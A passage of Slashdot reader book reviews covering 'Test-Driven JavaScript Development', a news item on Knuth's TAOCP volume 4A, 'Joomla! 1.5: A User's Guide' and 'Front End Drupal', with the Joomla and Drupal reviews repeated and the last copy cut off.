Chapter fifteen concentrates on building the chat client to the above server and in doing so provides the reader with TDD in regards to DOM manipulation and event handling. This chapter finally covers some of the more common problematic aspects of client-side JavaScript. Again, this chapter yielded many tricks that were new to me in TDD. JsTestDriver actually includes two ways to include HTML in a test and Johansen shows how to manipulate the user form on a page in order to test it automatically. The client is developed through TDD and node-paperboy is called in to serve up static files through http with Node.js. The message list displayed in the client is developed through TDD and then the same process used on the user form is done with the message form submission. The author brings in some basic CSS, Juicer and YUI Compressor to reduce all our work down into a 14kB js file containing an entire chat client. With gzip enabled it downloads at about 5kB. Potent stuff.

I was sad that more pages weren't spent on the final section. Chapter sixteen further expounds upon mocking, spies and stubbing. It lists different strategies and how to inject trouble into your code by creating stubs that blow up on purpose during testing. And we get a sort of abbreviated dose of Sinon, a mocking and stubbing library for JavaScript. The author repeats a few test cases from chapter eleven and moves on to mocking. Mocking is mentioned throughout the book but is passed over due to the amount of work required to manually mock something. The chapter ends with the author saying 'it depends' on whether you should use stubbing or mocks but it's pretty clear the author provides stubbing as he enumerates the pros and cons of each.

Chapter seventeen provides some pretty universal rules of thumb to employ when using TDD. From the obvious revealing intent by clear naming to strategies for isolating behavior, it's got good advice for succeeding with TDD. This advice aims to improve readability, generate true unit tests that stay at the unit level and avoid buggy tests. It's worth repeating that he gives a list of 'attacks' for finding deficiencies in tests: "Flip the value of the boolean expressions, remove return values, misspell or null variables and function arguments, introduce off-by-one errors in loops, mutate the value of internal variables." Introduce one deficiency and run the tests. Make sure they break when and where you would expect them to or your testing isn't as hardened as you might expect. Lastly the author recommends using JsLint (like lint for C).

There's a lot of information in this book but I think that the final examples were actually too interesting for my tastes. Often I grapple with the mundane and annoying parts of client side DOM — nothing on the server side. While this might change at some point in the future, I couldn't help but feel that the book would have been better with additional examples of more common problems than a chat client in JavaScript. I was certainly impressed with this example and it will hold the readers' attention much more than what I desire so I feel comfortable recommending this book with a 9/10 to anyone suffering from browser inconsistencies or looking to do TDD in JavaScript.

You can purchase Test-Driven JavaScript Development from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

jantangring writes "It's been 28 years since Volume 3 of Donald Knuth's The Art of Computer Programming was published. The book series is a classic work of computer science in spite of the fact that still more than half of the seven volume series is still to be finalized. In 1992 Donald Knuth retired to medieval monkness in order to finish his work. After many long years in draft, volume 4A now in print and you can get it in a boxed set if you don't mind admitting that you don't already own the first three volumes. They won't be checking if you read it."

Michael J. Ross writes "There are countless content management systems (CMSs) available for building websites, and they offer varying levels of built-in functionality. But once a site developer has successfully installed any given CMS, a critical form of help (or hindrance) is the CMS's documentation, which for some CMSs is quite impressive, and for others absolutely atrocious. Joomla is a powerful and popular choice for Web developers, but can be daunting to newbies confused by its non-intuitive menu structure and restrictive content hierarchy. The documentation for Joomla is frequently criticized, for various reasons, and that may largely account for the popularity of third-party books — such as Barrie M. North's Joomla! 1.5: A User's Guide, now in its second edition." Read on for the rest of Michael and Ethelyn's review. Joomla! 1.5: A User's Guide, 2nd Edition author Barrie M. North pages 480 publisher Prentice Hall rating 9/10 reviewer Michael J. Ross and Ethelyn Holmes ISBN 978-0137012312 summary A comprehensive introduction to creating sites using Joomla. The book was published by Prentice Hall, on 1 June 2009, under the ISBN 978-0137012312. Just as with its predecessor, this updated edition spans 480 pages, and the material is grouped into 12 chapters: an introduction to CMSs in general and Joomla in particular; downloading and installing Joomla; basic Joomla administration; content management using Joomla; menus and navigation; enhancing Joomla functionality with extensions, components, modules, plug-ins, and templates; creation of content via the back-end and front-end; attracting Web traffic using SEO, referrals, and other techniques; how to create pure CSS templates; and building example websites for a school, a restaurant, and a blog. The book wraps up with four appendices on getting assistance with any Joomla development hurdles; four separate Joomla case studies; an introduction to SEO concepts; and installing WampServer.

On the book's Web page, the publisher makes available a description of the book, excerpts from Amazon.com reviews, the table of contents, and a sample chapter — "Creating Pure CSS Templates in Joomla!" — as both an online article and as a downloadable PDF file. There are also links for purchasing the print version, and for reading the Safari Books online version.

In conjunction with the book, Prentice Hall has published a DVD training course, titled Fundamentals of Joomla!, under the ISBN 978-0137017812. It consists of 13 lessons, spanning more than nine hours of video instruction. The DVD includes a bonus chapter explaining how to set up a membership site, not covered in the print book. The DVD disc is accompanied by a 128-page book, which includes all of the PHP and CSS code used in the training, plus additional material. As of this writing, Barnes & Noble is selling Joomla! 1.5: A User's Guide, 2nd Edition and the video training course bundled together. Anyone purchasing the video course should be aware that Lesson #6 on the DVD has a compression problem, which causes a small lag between the audio and video streams. In response to this, Prentice Hall uploaded that particular lesson as a free download to the product's site, under the "Updates" tab. A multimedia training course such as this may be the ideal tool for someone who finds printed technical books to be rather dry, and prefers learning from audiovisual material.

In this review, we will be examining both the book and the DVD training course, as the two complement one another.

Barrie North is well regarded in the Joomla community, and for good reason. He frequently blogs about Joomla on the website of Compass Design, a consulting firm specializing in Joomla Web design and SEO. Joomla developers consider Compass Design's site a source for some of the most up-to-date information on the subject. Barrie also founded Joomlashack, a noted provider of Joomla templates and customization services. He has more than 15 years of Internet experience as a Web designer, plus over a decade of classroom teaching experience and curriculum development expertise. He consults on Web marketing, search engine optimization, usability, and standards compliance for Joomla. He's also a former member of the Joomla Design and Documentation Working Groups.

The title of his book's first chapter, "Content Management Systems and an Introduction to Joomla!," fairly describes what the reader will find. As a CMS, Joomla's primary function is to organize and present all the content stored in a site's database, avoiding the problems in the past of static HTML files. This chapter presents Joomla's out-of-the-box features and delineates its various parts, templates, and modules. The DVD mentioned above shows the differences between constructing an ordinary Web page with Dreamweaver and constructing one with Joomla. People who learn best visually should be pleased with this demonstration, as well as Barrie North's teaching approach. He holds one's attention with a friendly yet informative conversational style. This first chapter provides an in-depth tutorial that explains how Joomla displays its content articles, and how the developer can organize them into a hierarchical structure. It details how to plan and organize the content and user experience for the site. It also explains the hierarchy structure currently used in Joomla — sections and categories — and how to best structure content into them for small and large sites.

The second chapter, "Downloading and Installing Joomla!," gives the reader a very detailed explanation on how to get up and running with Joomla. It explains where one can find the most current Joomla files; how to unpack these files on a home computer or into a remote Web hosting account; how to use the Joomla Installation Wizard; and how one can support the Joomla project. Barrie states that the worst part of the Joomla installation process is setting up the MySQL database, and uploading all the files to a remote server. But for anyone who has performed those tasks with other software technologies, the process should not pose a problem.

Chapter 3, "Joomla! Administration Basics," shows how the power of the Joomla site administration system, despite its simplicity. Compared to such site administration systems as those for WebLogic and Oracle AS, Joomla's system is a piece of cake. Reader should find the DVD especially helpful during the presentation of the back-end, front-end, control panels, and menus — especially the demonstration and explanation of such topics as articles, the front page, sections, categories, and modules. Barrie also gives tips on how to import and export users to Joomla, and about language extensions.

The fourth chapter, "Content Is King: Organizing Your Content," is a substantial and key chapter for those building a site with Joomla. It delves into Joomla's so-called "managers": the Article Manager, Frontpage Manager, Section Manager, Category Manager, and Module Manager. The author explains how to organize content logically, and the role of components and modules. Someone new to Joomla could otherwise find the many components and modules confusing. Of course, one can play around with them, but it is much more efficient to learn what one is doing from an expert. He demonstrates the Custom HTML module very well, and in the DVD walks the viewer through the development of a site using it.

Creating menus and navigation in a CMS is often perplexing to the uninitiated, and that's the topic of Chapter 5. It covers how to work with menu items, and clears up the issue about how to get rid of the dreaded "Welcome to the Frontpage." It also gets into managing modules (as opposed to Chapter 4's managing module content). Barrie North states that menus are perhaps the core of a Joomla site. In a static HTML site, they merely serve as navigation; in a Joomla site, they not only serve that purpose, but also determine the layout of what a dynamic page will look like and what content will appear on that page when the visitor navigates to it. The relationships among menus, menu items, pages, and modules, are perhaps the most confusing aspect of Joomla. Newbies can find daunting why some menu content shows up in articles, and then how to get rid of it. In this chapter, the reader learns how to create a navigation scheme that works for a new site.

Chapter 6, "Extending Joomla!," explains why extensions are essential to any well-functioning Joomla site. Rare is the Joomla-powered website that has no additional functionality, beyond the basics. In the world of Joomla, the term "extension" collectively describes components, modules, plugins, and languages. There are many hundreds available, both free and commercially from third-party providers. This chapter covers the Joomla 1.5 core templates — Khepri, Milkyway, JA Purity, and Beez — as well as how to use third-party templates.

In Chapter 7, "Expanding Your Content: Articles and Editors," the author returns to the critical topic of content management — specifically, WYSIWYG (what you see is what you get) editing, and how it relates to the backend with what Joomla refers to as Managers, Administrators, and Super Administrators. Barrie North then examines how authors, editors, and publishers can manage content through the front-end, as well as how administrators can set various permissions through the Menu Managers. This is critical for the site developer who wants users to be able to update content in a controlled manner, without breaking other things (inadvertently or otherwise!). Quite useful is Joomla's "global checkout" feature, which allows only one user at a time the ability to lock and then edit articles, and, if necessary, fix problems with checked-out articles.

The most attractive and powerful Joomla site in the world will be useless without visitors. Chapter 8, "Getting Traffic to Your Site," benefits from the author's knowledge and experience in online marketing and search engine optimization. For instance, he explains why the developer should discourage clients who ask for Flash-heavy sites, because pages loaded down with Flash elements can discourage traffic, for various reasons. In the DVD training material, he presents a step-by-step process of bringing traffic to an example site, using Wordtracker and Google tools. He also shows how to use Google advertising tools such as AdWords and AdSense. Interestingly, Barrie North does not put too much stock in keywords and metadata, but rather emphasizes the use of page titles as traffic magnets. He argues in both the DVD and the book that while email blasts may be effective and popular marketing tools, they should be used with caution. He also covers how blogs are another useful method for bringing traffic to one's sites.

The final four chapters in the book are all hands-on application of concepts and lessons covered in the earlier part of the book — specifically, how to create pure CSS templates, and how to create the three sample sites (for a school, a restaurant, and a blog).

Appendix A provides information on getting help with Joomla. If one is interested in seeing how Joomla is used in the real world, then Appendix B should prove valuable, because it offers information on Joomla's usage for commercial and government websites. Appendix C provides a quick overview of search engine optimization. Appendix D goes into detail on WampServer installation, with corresponding illustrations.

The book contains some errata: "Cpanel" (pages 25, 27, and 289), and "add fee" (should read "ad fee"; page 218). Those errata were present in the first edition, and even pointed out to the publisher in an earlier review.

The book's material is organized so that the reader can utilize it as a tutorial, reading from cover to cover, or skim through and take what is needed at the moment. The introductory ideas in the earlier chapters are developed and built upon to help the reader understand more advanced concepts later on. The book can also be used as a reference. For instance, if the reader desires a quick overview of what newsletter extensions are available, Chapter 6 provides that information. Lastly, the appendices contain valuable extra information about various aspects of Joomla. The target audience does not have to understand PHP in order to read this book or work through the many examples. Each example is presented in a clear step-by-step fashion. If a reader were to implement all of the examples in her development environment, then she would gain the skills to be able to build a substantial website. The DVD has an extra chapter on building a membership site. If the reader would like to go into the business of creating Joomla templates, the author even has a chapter showing how to do just that.

Joomla! 1.5: A User's Guide, 2nd Edition is to be recommended, particularly when matched with the DVD training course. Together they form a valuable reference guide and self-teaching tool, for newbies as well as seasoned website developers.

Michael J. Ross is a freelance website developer and writer. Ethelyn Holmes is a software and website developer — primarily using Java / J2EE and Joomla.

You can purchase Joomla! 1.5: A User's Guide, 2nd Edition from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "There are countless content management systems (CMSs) available for building websites, and they offer varying levels of built-in functionality. But once a site developer has successfully installed any given CMS, a critical form of help (or hindrance) is the CMS's documentation, which for some CMSs is quite impressive, and for others absolutely atrocious. Joomla is a powerful and popular choice for Web developers, but can be daunting to newbies confused by its non-intuitive menu structure and restrictive content hierarchy. The documentation for Joomla is frequently criticized, for various reasons, and that may largely account for the popularity of third-party books — such as Barrie M. North's Joomla! 1.5: A User's Guide, now in its second edition." Read on for the rest of Michael and Ethelyn's review. Joomla! 1.5: A User's Guide, 2nd Edition author Barrie M. North pages 480 publisher Prentice Hall rating 9/10 reviewer Michael J. Ross and Ethelyn Holmes ISBN 978-0137012312 summary A comprehensive introduction to creating sites using Joomla. The book was published by Prentice Hall, on 1 June 2009, under the ISBN 978-0137012312. Just as with its predecessor, this updated edition spans 480 pages, and the material is grouped into 12 chapters: an introduction to CMSs in general and Joomla in particular; downloading and installing Joomla; basic Joomla administration; content management using Joomla; menus and navigation; enhancing Joomla functionality with extensions, components, modules, plug-ins, and templates; creation of content via the back-end and front-end; attracting Web traffic using SEO, referrals, and other techniques; how to create pure CSS templates; and building example websites for a school, a restaurant, and a blog. The book wraps up with four appendices on getting assistance with any Joomla development hurdles; four separate Joomla case studies; an introduction to SEO concepts; and installing WampServer.

On the book's Web page, the publisher makes available a description of the book, excerpts from Amazon.com reviews, the table of contents, and a sample chapter — "Creating Pure CSS Templates in Joomla!" — as both an online article and as a downloadable PDF file. There are also links for purchasing the print version, and for reading the Safari Books online version.

In conjunction with the book, Prentice Hall has published a DVD training course, titled Fundamentals of Joomla!, under the ISBN 978-0137017812. It consists of 13 lessons, spanning more than nine hours of video instruction. The DVD includes a bonus chapter explaining how to set up a membership site, not covered in the print book. The DVD disc is accompanied by a 128-page book, which includes all of the PHP and CSS code used in the training, plus additional material. As of this writing, Barnes & Noble is selling Joomla! 1.5: A User's Guide, 2nd Edition and the video training course bundled together. Anyone purchasing the video course should be aware that Lesson #6 on the DVD has a compression problem, which causes a small lag between the audio and video streams. In response to this, Prentice Hall uploaded that particular lesson as a free download to the product's site, under the "Updates" tab. A multimedia training course such as this may be the ideal tool for someone who finds printed technical books to be rather dry, and prefers learning from audiovisual material.

In this review, we will be examining both the book and the DVD training course, as the two complement one another.

Barrie North is well regarded in the Joomla community, and for good reason. He frequently blogs about Joomla on the website of Compass Design, a consulting firm specializing in Joomla Web design and SEO. Joomla developers consider Compass Design's site a source for some of the most up-to-date information on the subject. Barrie also founded Joomlashack, a noted provider of Joomla templates and customization services. He has more than 15 years of Internet experience as a Web designer, plus over a decade of classroom teaching experience and curriculum development expertise. He consults on Web marketing, search engine optimization, usability, and standards compliance for Joomla. He's also a former member of the Joomla Design and Documentation Working Groups.

The title of his book's first chapter, "Content Management Systems and an Introduction to Joomla!," fairly describes what the reader will find. As a CMS, Joomla's primary function is to organize and present all the content stored in a site's database, avoiding the problems in the past of static HTML files. This chapter presents Joomla's out-of-the-box features and delineates its various parts, templates, and modules. The DVD mentioned above shows the differences between constructing an ordinary Web page with Dreamweaver and constructing one with Joomla. People who learn best visually should be pleased with this demonstration, as well as Barrie North's teaching approach. He holds one's attention with a friendly yet informative conversational style. This first chapter provides an in-depth tutorial that explains how Joomla displays its content articles, and how the developer can organize them into a hierarchical structure. It details how to plan and organize the content and user experience for the site. It also explains the hierarchy structure currently used in Joomla — sections and categories — and how to best structure content into them for small and large sites.

The second chapter, "Downloading and Installing Joomla!," gives the reader a very detailed explanation on how to get up and running with Joomla. It explains where one can find the most current Joomla files; how to unpack these files on a home computer or into a remote Web hosting account; how to use the Joomla Installation Wizard; and how one can support the Joomla project. Barrie states that the worst part of the Joomla installation process is setting up the MySQL database, and uploading all the files to a remote server. But for anyone who has performed those tasks with other software technologies, the process should not pose a problem.

Chapter 3, "Joomla! Administration Basics," shows how the power of the Joomla site administration system, despite its simplicity. Compared to such site administration systems as those for WebLogic and Oracle AS, Joomla's system is a piece of cake. Reader should find the DVD especially helpful during the presentation of the back-end, front-end, control panels, and menus — especially the demonstration and explanation of such topics as articles, the front page, sections, categories, and modules. Barrie also gives tips on how to import and export users to Joomla, and about language extensions.

The fourth chapter, "Content Is King: Organizing Your Content," is a substantial and key chapter for those building a site with Joomla. It delves into Joomla's so-called "managers": the Article Manager, Frontpage Manager, Section Manager, Category Manager, and Module Manager. The author explains how to organize content logically, and the role of components and modules. Someone new to Joomla could otherwise find the many components and modules confusing. Of course, one can play around with them, but it is much more efficient to learn what one is doing from an expert. He demonstrates the Custom HTML module very well, and in the DVD walks the viewer through the development of a site using it.

Creating menus and navigation in a CMS is often perplexing to the uninitiated, and that's the topic of Chapter 5. It covers how to work with menu items, and clears up the issue about how to get rid of the dreaded "Welcome to the Frontpage." It also gets into managing modules (as opposed to Chapter 4's managing module content). Barrie North states that menus are perhaps the core of a Joomla site. In a static HTML site, they merely serve as navigation; in a Joomla site, they not only serve that purpose, but also determine the layout of what a dynamic page will look like and what content will appear on that page when the visitor navigates to it. The relationships among menus, menu items, pages, and modules, are perhaps the most confusing aspect of Joomla. Newbies can find daunting why some menu content shows up in articles, and then how to get rid of it. In this chapter, the reader learns how to create a navigation scheme that works for a new site.

Chapter 6, "Extending Joomla!," explains why extensions are essential to any well-functioning Joomla site. Rare is the Joomla-powered website that has no additional functionality, beyond the basics. In the world of Joomla, the term "extension" collectively describes components, modules, plugins, and languages. There are many hundreds available, both free and commercially from third-party providers. This chapter covers the Joomla 1.5 core templates — Khepri, Milkyway, JA Purity, and Beez — as well as how to use third-party templates.

In Chapter 7, "Expanding Your Content: Articles and Editors," the author returns to the critical topic of content management — specifically, WYSIWYG (what you see is what you get) editing, and how it relates to the backend with what Joomla refers to as Managers, Administrators, and Super Administrators. Barrie North then examines how authors, editors, and publishers can manage content through the front-end, as well as how administrators can set various permissions through the Menu Managers. This is critical for the site developer who wants users to be able to update content in a controlled manner, without breaking other things (inadvertently or otherwise!). Quite useful is Joomla's "global checkout" feature, which allows only one user at a time the ability to lock and then edit articles, and, if necessary, fix problems with checked-out articles.

The most attractive and powerful Joomla site in the world will be useless without visitors. Chapter 8, "Getting Traffic to Your Site," benefits from the author's knowledge and experience in online marketing and search engine optimization. For instance, he explains why the developer should discourage clients who ask for Flash-heavy sites, because pages loaded down with Flash elements can discourage traffic, for various reasons. In the DVD training material, he presents a step-by-step process of bringing traffic to an example site, using Wordtracker and Google tools. He also shows how to use Google advertising tools such as AdWords and AdSense. Interestingly, Barrie North does not put too much stock in keywords and metadata, but rather emphasizes the use of page titles as traffic magnets. He argues in both the DVD and the book that while email blasts may be effective and popular marketing tools, they should be used with caution. He also covers how blogs are another useful method for bringing traffic to one's sites.

The final four chapters in the book are all hands-on application of concepts and lessons covered in the earlier part of the book — specifically, how to create pure CSS templates, and how to create the three sample sites (for a school, a restaurant, and a blog).

Appendix A provides information on getting help with Joomla. If one is interested in seeing how Joomla is used in the real world, then Appendix B should prove valuable, because it offers information on Joomla's usage for commercial and government websites. Appendix C provides a quick overview of search engine optimization. Appendix D goes into detail on WampServer installation, with corresponding illustrations.

The book contains some errata: "Cpanel" (pages 25, 27, and 289), and "add fee" (should read "ad fee"; page 218). Those errata were present in the first edition, and even pointed out to the publisher in an earlier review.

The book's material is organized so that the reader can utilize it as a tutorial, reading from cover to cover, or skim through and take what is needed at the moment. The introductory ideas in the earlier chapters are developed and built upon to help the reader understand more advanced concepts later on. The book can also be used as a reference. For instance, if the reader desires a quick overview of what newsletter extensions are available, Chapter 6 provides that information. Lastly, the appendices contain valuable extra information about various aspects of Joomla. The target audience does not have to understand PHP in order to read this book or work through the many examples. Each example is presented in a clear step-by-step fashion. If a reader were to implement all of the examples in her development environment, then she would gain the skills to be able to build a substantial website. The DVD has an extra chapter on building a membership site. If the reader would like to go into the business of creating Joomla templates, the author even has a chapter showing how to do just that.

Joomla! 1.5: A User's Guide, 2nd Edition is to be recommended, particularly when matched with the DVD training course. Together they form a valuable reference guide and self-teaching tool, for newbies as well as seasoned website developers.

Michael J. Ross is a freelance website developer and writer. Ethelyn Holmes is a software and website developer — primarily using Java / J2EE and Joomla.

You can purchase Joomla! 1.5: A User's Guide, 2nd Edition from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "Content management systems (CMSs) are created largely by Web developers using back-end programming languages (such as PHP, by far the most common choice). The free CMSs are built as open source projects, by volunteers who have many demands on their time. As a result of both of these competing factors, far less time is devoted to the front-end aspects of these CMSs. In turn, the "themes" that define the appearance of a CMS-based website are typically substandard, in the eyes of many Web designers and, most likely, countless users of those sites. This criticism has been leveled even against Drupal, although the situation is improving. A new book, Front End Drupal: Designing, Theming, Scripting, is intended to help Drupal designers everywhere speed up that process of improvement." Read on for the rest of Michael's review. Front End Drupal: Designing, Theming, Scripting author Emma Jane Hogbin and Konstantin Kafer pages 456 publisher Prentice Hall rating 8/10 reviewer Michael J. Ross ISBN 978-0137136698 summary A comprehensive guide to creating Drupal themes. The book was written by Emma Jane Hogbin and Konstantin Käfer, and published by Prentice Hall on 15 April 2009, under the ISBN 978-0137136698. As suggested by its title, Front End Drupal "is designed to help both experienced designers and rank novices get an understanding of how Drupal theming works," to quote from the book's foreword, written by Dries Buytaert, Drupal's founder and project lead. He notes that creating a Drupal theme requires knowledge of "XHTML, CSS, JavaScript, and PHP, all within the context of Drupal." These are some of the key technologies addressed in the book's eleven chapters, and it assumes that the reader is at least familiar with all four of them. The first of the two appendices explains: how to install Drupal and contributed modules on the three different platforms supported (Windows, Linux, and Mac OS X); basic configuration and administration; and installation troubleshooting tips. The second appendix comprises some of the more important example code used in the book, and brief overviews thereof. At the end of the book's 456 pages, there is a coupon code for a 45-day free subscription to read the online edition in the Safari Books Online library

All of the sample source code and themes can be downloaded from the authors' book website. The site also has the author biographies, as well as reported errata, of which there are two, as of this writing. What is most striking about the site is its styling — or lack thereof. One would think that the authors of a book on Drupal theming would have put a commensurate amount of effort into crafting an attractive custom theme for their own website — one that demonstrates their own theming skills and, more importantly to the reader, what is possible using the principles taught in the book. Remarkably, the authors appear to have done nothing more than take the Drupal 6 default theme, Garland, and change the color scheme from shades of blue to shades of brown (matching the book cover); only the blue Drupal icon is unchanged, and its color clashes with the rest of the site.

Prentice Hall makes available their own Web page for the book, where visitors will find a description, two Amazon.com reviews, the table of contents, and a sample chapter ("The Drupal Page") as a PDF file. The entire book is also available in electronic form.

In the book's preface, the authors briefly summarize the chapters and appendices, and define the target audience and technologies with which the reader should be knowledgeable (noted above). Readers should also be familiar with how Drupal works, have some experience administering a Drupal site, and ideally possess some knowledge of website design and development; but that last one is not a hard requirement, since the authors promise to explain the basic concepts as needed.

Any reader who begins the book by skimming the table of contents or the preface's summary of Chapter 1, may be tempted to skip that chapter, especially since it discusses team workflow — something freelancers generally ignore, and employees leave to management. Yet the earlier material is worth reading, if only that it begins to establish a baseline of terminology used throughout the rest of the book. It also provides some basic information on content structure, layout, and naming on a Drupal page. For illustrating the ideas under discussion, the authors use a number of existing websites. In fact, too many different sites: Readers probably would have found it more useful for each idea to be presented in the context of a single neutral subject area, and without distractions such as toilet birthdays (no kidding). Even better, the ideas could have been illustrated through example pages — each page illustrating one or several ideas — built from the ground up. By focusing on pages that a reader could quickly create on his own, the authors could have eliminated the screenshots of those various websites. One example is Figure 1.1, which combines two images, with the topmost one largely obscuring the one below. Most of the topics are covered at a very high level — possibly higher in some cases than readers will find valuable. Nonetheless, there is much solid advice, including some recommended theme resources later in the chapter. In the earlier section on "Topical Organization," there is a brief but excellent discussion on the relative merits of limited versus unlimited tag vocabularies.

The second chapter continues to lay the groundwork, by introducing basic Drupal theme strategies and terminology, three major modules that veteran Drupal developers use frequently (CCK, Views, and Devel), and some valuable browser-based development tools. The definitions of Drupal terms are useful — especially for newbies confused by the Drupal handbooks. One exception is the authors' alternative metaphor for "weight," which proves more confusing than the original. Readers then begin learning how to use the aforesaid modules and tools. However, several of the authors' statements are misleading: On page 43, they are instructed to install the CCK module, and then given a list of additional modules needed; the first one on the list is... CCK. On the next page, the authors state that the FileField module requires the Token module, but it apparently does not. On the page after that, the "manage fields" link is given as the "add field" link. Those last two discrepancies suggest that the book is based on outdated versions of Drupal and/or the contributed modules under discussion, even though its publication date is just a few weeks prior to this writing. Any version differences are likely impossible to confirm, since the authors fail to mention which versions they are using, or provide any guidance to the reader as to which versions to use — unusual for a programming book. At the beginning of the chapter, the reader is told he "will learn step-by-step how to create a mini portfolio Web site," but the process peters out not long after a new content type is created, and the reader finishes the chapter with no such portfolio site.

Chapters 3 and 4 move the reader one step closer toward the ultimate goal of being able to create a new theme with confidence. The first one explains how to find, install, and configure prebuilt themes — also, how to create a very basic theme from scratch, and a subtheme using the Zen starter theme. This material comprises a generally thorough introduction to the topics, compared to most documentation, with plenty of step-by-step explanation. An exception is the Zen section, in which the reader is instructed to place the directory into the themes folder; but it is not made clear whether this is the primary Drupal themes folder, or sites/all/themes (as advised several pages earlier). Secondly, in step 3, readers can only guess as to what is meant by "the main CSS file," as there are several. On the next page, the authors mention "configure" links next to the Zen and Zen Classic themes, but no such links exist for those starter themes. The fourth chapter discusses page template files, site-wide variables, menus and navigation, regions and blocks, search results, templating different sections of a site, aliased URLs, taxonomy templates, and styling for output to printers, PDF files, and mobile devices.

The fifth chapter explores the details of how to modify existing node templates, or create new ones, for all content types. This is what makes it possible to develop highly customized page content, including summaries, embedded images, image galleries, and content based upon output from the Views module. The subsequent chapter focuses on one of the most problematic types of content — forms — and how they can be created using the CCK. The authors recommend TinyMCE as one's WYSIWYG editor module, but that has apparently been replaced by the Wysiwyg API. User editing of content is a key element in building an online community using a Drupal-based site, and it is the topic of Chapter 7, which discusses user profiles, permissions, access, comments, blogs, forums, wikis, spam, CAPTCHAs, and how to make content private for members only. The next chapter addresses the theming of the administrative interface, which the typical site user will never see, but can have a significant impact upon the productivity of the developers and maintainers of a site. Readers learn about RootCandy (a refreshingly different admin theme), and how to theme error pages.

The final three chapters focus on JavaScript and jQuery. Consequently, they compose a stand-alone resource of their own, and could even have been used as the basis for a separate book. Chapter 9 provides an overview of the language, while the other two chapters cover jQuery and how it can be used as part of a Drupal-based site.

Scattered throughout the manuscript are tips, each indicated with a pencil tip icon. These help to break up the text visually, and provide valuable guidance. The contrast between the black text and the dark gray background could certainly be improved; but most of the tips are fairly short, so this does not pose a major problem.

Every chapter ends with a summary, and not a single one of them is useful or needed. Any unique information conveyed in them should have been merged with the introductory paragraphs for the respective chapters, which is where readers would be looking anyway to see what each chapter addresses.

The book has numerous minor problems, including grammatical and stylistic errors, such as dashes incorrectly performing the duty of semicolons, some URLs missing the root directory slash, and excessive use of exclamation marks (more than a dozen before even reaching the second chapter). When stating the sequence of menu items to choose in order to reach a particular admin page, the authors should use ">" or ">>" to separate the menu choices, as is done in most computer books. Instead, the authors opted to use commas, which of course turns every sequential menu path into a list of menu items, which is nonstandard and disconcerting. As is typical in a first edition, the book contains several errata: "Partnership" in Figure 1.7 (page 10), "the GiMP" (page 14; should simply read "GIMP"; after all, this isn't Pulp Fiction), "only focus only" (page 26), "Modification / Date" in Figure 2.1 (page 37; should read "Modification date"), "Content Creation Kit" (throughout the book; should read "Content Construction Kit"), "of [the] view" (page 56), "http:jigsaw" (page 66), "INSTALL [is] present" (page 79), "of [a] page" (page 100), and "to to" (page 125) — in the first quarter of the book alone.

A lingering disappointment is that some of the promised examples are not finished in the narrative, such as the portfolio site mentioned earlier. Secondly, the downloadable source code is incomplete, apparently missing the example code in the first few chapters, such as the Bolg theme files. Furthermore, the downloadable code is not organized by chapter, making it difficult to even determine what example code is missing.

On the other hand, the book has much to offer. For the most part, the explanations and step-by-step instructions are clear, and the diagrams and screenshots are all neatly presented and helpful — though some sections of the book could have benefited from more such figures. With its extensive coverage of all the key technologies, and its wealth of valuable tips, Front End Drupal is an essential resource for learning how to create Drupal themes, and fills a long-standing gap in the Drupal literature, better than any other book currently available.

Michael J. Ross is a freelance Web developer and writer.

You can purchase Front End Drupal: Designing, Theming, Scripting from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "Content management systems (CMSs) are created largely by Web developers using back-end programming languages (such as PHP, by far the most common choice). The free CMSs are built as open source projects, by volunteers who have many demands on their time. As a result of both of these competing factors, far less time is devoted to the front-end aspects of these CMSs. In turn, the "themes" that define the appearance of a CMS-based website are typically substandard, in the eyes of many Web designers and, most likely, countless users of those sites. This criticism has been leveled even against Drupal, although the situation is improving. A new book, Front End Drupal: Designing, Theming, Scripting, is intended to help Drupal designers everywhere speed up that process of improvement." Read on for the rest of Michael's review. Front End Drupal: Designing, Theming, Scripting author Emma Jane Hogbin and Konstantin Kafer pages 456 publisher Prentice Hall rating 8/10 reviewer Michael J. Ross ISBN 978-0137136698 summary A comprehensive guide to creating Drupal themes. The book was written by Emma Jane Hogbin and Konstantin Käfer, and published by Prentice Hall on 15 April 2009, under the ISBN 978-0137136698. As suggested by its title, Front End Drupal "is designed to help both experienced designers and rank novices get an understanding of how Drupal theming works," to quote from the book's foreword, written by Dries Buytaert, Drupal's founder and project lead. He notes that creating a Drupal theme requires knowledge of "XHTML, CSS, JavaScript, and PHP, all within the context of Drupal." These are some of the key technologies addressed in the book's eleven chapters, and it assumes that the reader is at least familiar with all four of them. The first of the two appendices explains: how to install Drupal and contributed modules on the three different platforms supported (Windows, Linux, and Mac OS X); basic configuration and administration; and installation troubleshooting tips. The second appendix comprises some of the more important example code used in the book, and brief overviews thereof. At the end of the book's 456 pages, there is a coupon code for a 45-day free subscription to read the online edition in the Safari Books Online library

All of the sample source code and themes can be downloaded from the authors' book website. The site also has the author biographies, as well as reported errata, of which there are two, as of this writing. What is most striking about the site is its styling — or lack thereof. One would think that the authors of a book on Drupal theming would have put a commensurate amount of effort into crafting an attractive custom theme for their own website — one that demonstrates their own theming skills and, more importantly to the reader, what is possible using the principles taught in the book. Remarkably, the authors appear to have done nothing more than take the Drupal 6 default theme, Garland, and change the color scheme from shades of blue to shades of brown (matching the book cover); only the blue Drupal icon is unchanged, and its color clashes with the rest of the site.

Prentice Hall makes available their own Web page for the book, where visitors will find a description, two Amazon.com reviews, the table of contents, and a sample chapter ("The Drupal Page") as a PDF file. The entire book is also available in electronic form.

In the book's preface, the authors briefly summarize the chapters and appendices, and define the target audience and technologies with which the reader should be knowledgeable (noted above). Readers should also be familiar with how Drupal works, have some experience administering a Drupal site, and ideally possess some knowledge of website design and development; but that last one is not a hard requirement, since the authors promise to explain the basic concepts as needed.

